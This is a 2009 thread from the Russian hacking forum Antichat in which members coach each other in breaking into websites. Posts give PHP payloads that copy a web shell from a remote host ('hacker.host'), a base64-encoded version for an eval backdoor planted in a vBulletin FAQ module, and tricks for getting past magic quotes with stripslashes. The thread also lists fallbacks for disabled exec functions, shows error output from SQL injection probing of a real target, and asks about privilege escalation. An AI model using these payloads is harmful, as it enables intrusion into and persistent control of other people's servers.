ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.09.2009, 15:10
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от Explоit
а если его нету в системе? + вырублена функция system(),exex(),passtru()
shell_exec, popen, pcntl_exec.
Кроме wget есть еще links, lynx, curl, GET, fetch
|
|
|
16.09.2009, 15:22
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Сообщение от InFlame
Лей шелл вот так:
Код:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
Код:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>
Спасибо, люди!
Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.
|
|
|
|
16.09.2009, 15:30
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз 
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Сообщение от ElteRUS
Чего полезного из этого можно извлечь ?
Сам хз
Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке выводит
Код:
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
Line 139: forumid = CLng(SafeHTML(Request.QueryString("forumid")))
Line 140: If mode = "edit" Then
Line 141: forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
Line 142: arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
Line 143: If IsArray(arrTheArray) Then
Source File: не скажу :) Line: 141
Stack Trace:
[FormatException: Input string was not in a correct format.]
Microsoft.VisualBasic.CompilerServices.Conversions.ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +178
[InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
Microsoft.VisualBasic.CompilerServices.Conversions.ToLong(String Value) +714736
ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
System.Web.UI.Control.RenderChildrenInternal(HtmlTextWriter writer, ICollection children) +115
System.Web.UI.Page.Render(HtmlTextWriter writer) +38
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
|
|
|
|
16.09.2009, 16:33
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
спасибо
|
|
|
|
16.09.2009, 16:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
milw0rm.com в помощь |
|
|
|
16.09.2009, 17:09
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
местоположение faq_comlete, код например
copy("http://ааа/file.txt","./shell.php");
при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал
то заработало faq?e=phpinfo();
Дайте пожалуйста чёткие указания, какой код вписать в faq.?e= |
|
|
|
16.09.2009, 17:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
|
|
|
|
16.09.2009, 17:15
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Сообщение от mailbrush
Код:
e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4dCIsIi4vc2hlbGwucGhwIik7');
там магические кавычки в ON
|
|
|
|
16.09.2009, 17:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Explоit
там магические кавычки в ON
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
|
|
|
|
16.09.2009, 17:23
|
|
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854
Репутация:
-11
|
|
Сообщение от geezer.code
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));
Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)
Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
